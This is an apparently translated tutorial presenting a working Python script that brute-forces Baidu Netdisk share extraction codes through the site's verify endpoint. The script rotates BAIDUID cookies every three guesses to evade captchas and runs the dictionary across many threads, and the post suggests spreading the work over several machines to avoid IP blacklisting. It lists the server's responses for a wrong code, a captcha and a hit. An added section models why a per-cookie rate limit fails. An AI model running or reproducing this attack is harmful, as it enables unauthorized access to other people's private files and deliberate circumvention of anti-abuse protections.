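Goal: brute-force the extraction code of a Baidu Netdisk share
Extraction code composition: digits + letters (not case-sensitive)
Order of magnitude: 36*36*36*36 = 1679616
Method: simulate a browser submitting the extraction code
Runtime environment: Windows (10), Python 3.5.2, dictionary file dic.txt (https://drop.me/BNYprM)
Run the following command in the Windows cmd command line (getbkey.py is in the current directory; otherwise give its absolute path):
python getbkey.py "https://pan.baidu.com/share/init?shareid=1217313490&uk=2225629318"
The main file, getbkey.py, is as follows: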
#coding:utf-8
import re,sys,time,requests,string,hashlib,threading
from sys import argv
keyone,keytwo= argv
print ("分享網頁地址是:", keytwo)
def getBAIDUID():
    # Trying a code through the API requires a BAIDUID, but after three uses a captcha is required.
    # Here requests.get() simulates opening Baidu to obtain the BAIDUID from the cookie;
    # each requests.get() call yields a different BAIDUID.
    bdua={
        "Host":"www.baidu.com",
        "Connection":"keep-alive",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Upgrade-Insecure-Requests":"1",
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
        "Accept-Encoding":"gzip, deflate, sdch",
        "Accept-Language":"zh-CN,zh;q=0.8"
    }
    baiduid=requests.get("https://www.baidu.com",headers=bdua)
    return(re.findall("'Set-Cookie': '(.*?);",str(baiduid.headers))[0])
def main():
    URL=keytwo.replace('init','verify')
    t = int(time.time() * 1000)# 13-digit timestamp
    URL=URL+"&t="+str(t)+"&bdstoken=137f8d2d20098d01f579bd720f5e5531&channel=chunlei&clienttype=0&web=1&app_id=250528&logid=MTUwNDQwNzk0MTI2NjAuNzExODQyNzI1MDMzMjE4"
    print(URL)# It is recommended to replace the part of the URL after t with your own... it can be obtained via the browser's F12 tools
    for n in range(0,35):
        t=threading.Thread(target=singledog,args=(n,URL))
        # Start one thread every 5 seconds, splitting the dictionary into 36 parts run concurrently for efficiency;
        # on a low-spec machine some threads may die on their own after a while. No fix found yet;
        # reducing the thread count is recommended.
        t.start()
        time.sleep(5)# Without a time interval the threads all run at once and exhaust memory
def singledog(n,URL):
    i=0
    f = open('C:\dic.txt', "r")# dic.txt is the dictionary 0000-zzzz, read line by line; this is an absolute path
    for payload in f.readlines()[n*36*36*36:(n+1)*36*36*36]:# Read a segment of the dictionary based on n; adjust as needed
        payload = payload.strip('\n')
        print (str(payload));i=i+1
        payloaddata={
            "pwd":payload,
            "vcode":"",
            "vcode_str":""
        }
        # The first attempt needs a BAIDUID, so this runs when the remainder is 1.
        # The BAIDUID must also be refreshed every 3 attempts, otherwise a captcha appears.
        if i%3==1:
            ua = {
                "Host":"pan.baidu.com",
                "Connection":"keep-alive",
                "Content-Length":"26",
                "Pragma":"no-cache",
                "Cache-Control":"no-cache",
                "Accept":"*/*",
                "Origin":"https://pan.baidu.com",
                "X-Requested-With":"XMLHttpRequest",
                "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
                "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
                "Referer":keytwo,
                "Accept-Encoding":"gzip, deflate",
                "Accept-Language":"zh-CN,zh;q=0.8",
                "Cookie":"PANWEB=1; "+getBAIDUID()# refresh the BAIDUID here
            }
        a = requests.post(url=URL,data=payloaddata,headers=ua).cookies;
        if "BDCLND" in a:
            print (str(a)+'\n'+'OK')
            f = open("out.txt", "w+")# On success, save the extraction code to out.txt in the current path
            f.write(payload)
            f.close()
            exit()
    f.close()
main()
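Other notes:
- I'm a beginner and haven't learned standard formatting yet, so make do with the code as it is...
- The part that refreshes the UA could probably be simplified?
- With a single thread the program ends once the extraction code is found, but with multiple threads I don't know how to stop the other threads after one thread gets the code...
- The link on the command line must be the long link, not a short link like http://pan.baidu.com/s/1c1Hs7s8 (in fact, opening the short link in a browser gives you the long link...)
- About 8 threads seems fairly stable? I suggest running on several machines together; too many requests from the same IP may get it blacklisted
- Failure response (wrong password):
{"errno":-9,"err_msg":"","request_id":5262813406111293057}
- Captcha error:
{"errno":-62,"err_msg":"","request_id":5262813406111293057}
- Success response:
{"errno":0,"err_msg":"","request_id":5262846836500273100}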
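The script above avoids the captcha by fetching a fresh BAIDUID every three guesses, which only works if the failure counter is keyed on that client-supplied cookie. The following added example (not from the original post; the class, function and field names and the sample requests are constructed assumptions, not Baidu's implementation) compares that keying with a counter keyed on the share being guessed.

```python
from collections import defaultdict, deque

class AttemptLimiter:
    """Sliding-window count of failed extraction-code checks per key."""
    def __init__(self, max_failures, window_s):
        self.max_failures = max_failures
        self.window_s = window_s
        self._fails = defaultdict(deque)

    def needs_captcha(self, key, now):
        q = self._fails[key]
        while q and now - q[0] > self.window_s:
            q.popleft()                      # forget failures outside the window
        return len(q) >= self.max_failures

    def record_failure(self, key, now):
        self._fails[key].append(now)

def simulate(key_fn, attempts=30, rotate_every=3):
    """Replay constructed wrong guesses against one share.

    The client swaps its cookie every `rotate_every` requests, as the page
    describes. Returns how many guesses were checked without a captcha."""
    limiter = AttemptLimiter(max_failures=3, window_s=3600)
    unchallenged = 0
    for i in range(attempts):
        # Constructed request: same share every time, cookie rotates.
        req = {"shareid": "SHARE-1", "cookie": "id-%d" % (i // rotate_every)}
        key, now = key_fn(req), float(i)
        if limiter.needs_captcha(key, now):
            continue                         # guess is not evaluated
        unchallenged += 1
        limiter.record_failure(key, now)
    return unchallenged

def hours_to_exhaust(keyspace, max_failures, window_s):
    """Time to try every code when only max_failures guesses pass per window."""
    return keyspace * window_s / (max_failures * 3600)

if __name__ == "__main__":
    print("keyed on cookie:", simulate(lambda r: r["cookie"]))    # limiter never fires
    print("keyed on share: ", simulate(lambda r: r["shareid"]))   # capped at 3
    print("hours for 36**4 codes:", hours_to_exhaust(36**4, 3, 3600))
```

Keying on the share turns a wrong-guess flood into a captcha for every visitor of that share, so the response should be a challenge rather than a hard lockout.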
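Attached is a screenshot of the run for the command-line example above
Too much tinkering... I've already been blacklisted (I don't know when either)... as shown:
The normal response when a wrong code is entered:
The returned header data:
Packet capture:
And this is when the correct code is entered; you will notice that the returned cookies include a set-cookie entry:
Below is a demonstration of a run (single thread):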